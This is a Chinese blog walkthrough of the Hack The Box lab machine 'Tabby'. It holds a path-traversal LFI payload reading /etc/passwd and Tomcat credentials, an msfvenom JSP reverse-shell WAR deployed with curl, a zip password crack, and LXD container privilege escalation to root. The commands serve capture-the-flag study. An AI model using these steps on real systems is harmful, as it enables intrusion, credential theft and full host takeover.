HTB Walkthrough -- Tabby

最新推荐文章于 2023-08-25 12:11:29 发布
最新推荐文章于 2023-08-25 12:11:29 发布
阅读量331 收藏 1
点赞数
分类专栏: HTB 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_36853972/article/details/109293107
版权

Tabby

信息收集

域名:

  • megahosting.htb
  • megahosting.com

端口:

  • 8080
  • 80
  • 22

megahosting.htb

URLNotespayloads
/news.php?file=statementLFIfile=…/…/…/…/etc/passwd

8080

PointsNotes
Web SeverTomcat V9.0.31
Host ServerLinux
default Tomcat home page/var/lib/tomcat9/webapps/ROOT/index.html (can read)
CATALINA_HOME/usr/share/tomcat9
CATALINA_BASE/var/lib/tomcat9
following the rules from/usr/share/doc/tomcat9-common/RUNNING.txt.gz (can read)
tomcat9-docshttp://10.10.10.194:8080/docs/
tomcat9-exampleshttp://10.10.10.194:8080/examples/
tomcat9-adminhttp://10.10.10.194:8080/manager/html & http://10.10.10.194:8080/host-manager/html (need userame and password)
Users are defined in/etc/tomcat9/tomcat-users.xml

80

  • Apache/2.4.41
  • Ubuntu

/etc/passwd 的内容,可以看到有两个值得关注的用户:tomcat和ash

自己跟着教程部署了一遍tomcat9
tomcat9的tomcat-users.xml会在安装目录的conf下
Tabby的tomcat的安装目录是/usr/share/tomcat9
通过fuzz,conf被改成了etc
http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml

读取页面源代码,发现host-manager的登录密码:tomcat:$3cureP4s5w0rd123!
登录

Get Shell

在tomcat的文档中找到关于远程部署war包的一种方法

http://10.10.10.194:8080/docs/manager-howto.html

用msf生成一个war包
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.52 LPORT=2323 -f war > shell.war

用curl把war上传到Tabby中
curl -u 'tomcat':'$3cureP4s5w0rd123!' -T shell.war http://10.10.10.194:8080/manager/text/deploy?path=/tabby-shell

-u 后的参数 一定要用单引号

curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/tabby-shell/

路径最后要加反斜杠/

python3 -c "import pty;pty.spawn('/bin/bash')"

成功getshell了

tomcat --> ash

根据之前找到的用户信息,可以明确下一步是要提权为ash用户
在/var/www/html中发现一个跟ash相关的文件夹,里面只有一个zip跟ash相关

访问http://10.10.10.194/files/16162020_backup.zip,下载这个zip包
破解时需要密码,常规用fcrackzip尝试爆破
fcrackzip -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip -v
爆破出的密码是admin@it

su ash
cat /home/ash/user.txt

得到user的hash

ash --> root

查看ash用户的信息,发现这个用户属于不同的组别,其中有个lxd

通过Google到一篇lxd提权的文章:看我如何利用LXD实现权限提升

跟着文章的内容,一步一步往下走

https://github.com/saghul/lxd-alpine-builder/issues/1
cd lxd-alping-builder
./build-alpine

btw,这里可能会出问题,issue里面有解决方法,可以参考参考

在自己的操作机中开启python的http服务
python -m SimpleHTTPServer

然后在Tabby中执行下面步骤
wget http://10.10.14.52:8000/alpine-v3.12-x86_64-20201023_0314.tar.gz
lxc image import alpine-v3.12-x86_64-20201023_0314.tar.gz --alias myimage
lxc image list

lxc init myimage ignite -c security.privileged=true

如果出现了下图的问题,可以参考这篇文章:https://techoverflow.net/2018/05/03/how-to-fix-lxd-failed-container-creation-no-storage-pool-found-please-create-a-new-storage-pool/

执行 lxd init
所有设置均默认,执行完毕后,问题可以得到解决

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

cd /mnt/root/root

总结

  1. Tomcat定义host-manager和manager用户的路径:/安装路径/conf(or etc)/tomcat-users.xml
  2. 注意看文件夹的用户属性
  3. lxd提权

附加

  1. 什么是lxc和lxd
    lxc,linux Container,是一种轻量级虚拟化技术,lxc可以创建一个跟正常Linux操作系统十分接近的环境,但是不需要使用到单独的内核资源。
    lxd,Linux Daemon,是一个轻量级容器管理程序,而LXD是基于LXC容器技术实现的。

参考链接

  1. https://zhuanlan.zhihu.com/p/143981355
  2. https://www.freebuf.com/articles/system/216803.html
  3. https://techoverflow.net/2018/05/03/how-to-fix-lxd-failed-container-creation-no-storage-pool-found-please-create-a-new-storage-pool/
  4. http://jimolonely.github.io/2019/08/20/server/009-tomcat9-doc-5-manager/
khuntor
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTB walkthrough -- Admirer
sinat_36853972的博客
07-14 540
HTB walkthrough – Admirer 0x01 信息收集 使用nmap扫描端口开放情况 dirb搜索到robots.txt 访问robots.txt,页面中提到一个文件夹/admin-dir 用wfuzz对这个文件进行扫描 得到contacts.txt 和 credentials.txt 看到有一个ftp用户,尝试ftp登录 登录成功,将dump.sql和html.tar.gz文件下载到本地 html.tar.gz解压后,分别有以下内容 index.php utility-scr
Tabby-Shell工具
07-29
开源Shell工具 搬运地址: https://github.com/Eugeny/tabby/tree/master
HTB-tabby
hee_mee的博客
08-24 495
zeronil
XShell优替:Tabby安装使用【Windows】
李金柯的博客
11-08 692
Windows环境下的Tabby安装使用
一款好用的Shell工具-Tabby
hq091117的博客
08-24 437
一款好用的Shell工具-Tabby
再见 Xshell替代工具Tabby
最新发布
nalanxiaoxiao2011的博客
08-25 1065
再见 Xshell替代工具Tabby
HTB setup script-开源
05-02
HTB.init是从CBQ.init派生的Shell脚本,它允许在Linux上轻松设置基于HTB的流量控制。 HTB(分层令牌桶)是一种新的排队规则,它试图解决当前CBQ实施中的弱点。
HTB_tools-开源
05-02
`HTB_tools-开源`是一款专为网络带宽管理设计的开源软件,它致力于简化网络环境中的上传和下载带宽分配的配置过程,同时提供了方便的监控功能。这款工具对于网络管理员来说尤其重要,因为它可以帮助他们高效地管理和...
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
tabby:一个更现代的终端(以前的 Terminus)
08-03
下载: Tabby (以前称为Terminus )是一个高度可配置的终端模拟器、SSH 和串行客户端,适用于 Windows、macOS 和 Linux 集成的 SSH 客户端和连接管理器 集成串口终端 主题和配色方案 完全可配置的快捷键和多和弦快捷键 拆分窗格 记住你的标签 PowerShell(和 PS Core)、WSL、Git-Bash、Cygwin、Cmder 和 CMD 支持 通过 Zmodem 从/到 SSH 会话的直接文件传输 完整的 Unicode 支持,包括双角字符 不会因快速流动的输出而窒息 Windows 上的正确 shell 体验,包括选项卡完成(通过 Clink) 用于 SSH 机密和配置的集成加密容器 内容 主题 贡献 虎斑猫是什么,不是什么 Tabby 是Windows 标准终端(conhost)、PowerShell ISE、PuTTY 或 iTer
tabby manager:Windows 的替代 alt-tab 管理器-开源
07-11
windows alt-tab 管理器的简单替代品。 功能文本搜索,显示地铁,还有经典的窗口,支持多显示器(现在有一些小问题)。 依赖项:Visual Studio 2013 Redistributable Net Framework 4.5 支持的系统:Windows 7 32/64 位 Windows 8 32/64 位 Windows 8.1 32/64 位
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
《Python库htb_cli-0.1.1-py3-none-any.whl详解及应用》 在Python的世界里,库是开发者的重要工具,它们提供了丰富的功能,极大地提升了开发效率。今天我们将聚焦于一个名为`htb_cli`的Python库,其版本为0.1.1,...
T-HTB manager-开源
05-03
T-HTB免费网络界面,内置PHP,简单的Java脚本,Ajax,嵌套集模型MySQL,rrd图,使用iptables创建tc命令CLASSIFY
Tabby-安装&使用教程,可定制的跨平台终端神器,免费开源,ssh与sftp使用技巧,快捷上传下载文件,常用和高端功能介绍,多窗口显示
热门推荐
Xminyang的博客
04-30 3万+
Tabby是一个无限可定制的跨平台终端应用程序,适用于local shells、serial、SSH和Telnet的连接。 Tabby是基于TypeScript开发的终端模拟器,可用于Linux、Windows和Mac OS系统。 Tabby (前身是 Terminus) 是一个可高度配置的终端模拟器和 SSH 或串口客户端,支持 Windows,macOS 和 Linux。...
windows远程linux工具之tabby的使用
weixin_42630613的博客
04-07 1万+
文章目录下载安装包连接linux本地文件上传下载服务器的文件到本地 下载安装包 双击打开tabby.exe 连接linux 经常要用的设备可以加入到tabby的设置里,操作如下: 此处的SSH connection位置可能有所差异 在Name对应位置输入该设备的名称,比如26服务器, Host输入服务器ip192.168.1.26, Username输入用户名ubuntu, 点击set password 输入密码,点击ok 点击save即可,如果重设密码,点forget,对密码进行重设。
Hack the box靶机 Tabby
菜浪马废的博客
09-21 383
开放80和8080 查看一下 点击news时发生错误 看见?file= 可能有文件包含 先修改/etc/hosts 把10.10.10.194 megahosting.htb加入 再次访问 可以成功访问了 接下来测试是否是文件包含漏洞 访问/etc/passwd 发现用户ash 8080上市tomcat9 访问/usr/share/tomcat9/etc/tomcat-users.xml tomcat登录账号 tomcat:$3cureP4s5w0rd123! 登录成功 tomcat.
Hack The Box——Tabby
江左盟的博客
07-14 1万+
简介 信息收集 使用nmap快速扫描端口,如图: 查看80端口web服务,如图: 发现一个地址,添加到hosts文件, 漏洞发现 尝试读取/etc/passwd 尝试使用相对路径 /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3..
Tabby服务器远程SSH登录
xeqja的博客
01-31 3040
这是我自己实践的总结。本文介绍的如何在Windows下使用Tabb终端连接远程服务器,包括Tabby的安装,本地秘钥对的生成,远程服务器的配置和SSH登录设置等都很详细。还提供了Tabby的下载连接。
CVE-2023-4016
08-17
- *1* *2* [HTB HARD 靶机 Cerberus WriteUp](https://blog.csdn.net/qq_58869808/article/details/129786875)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值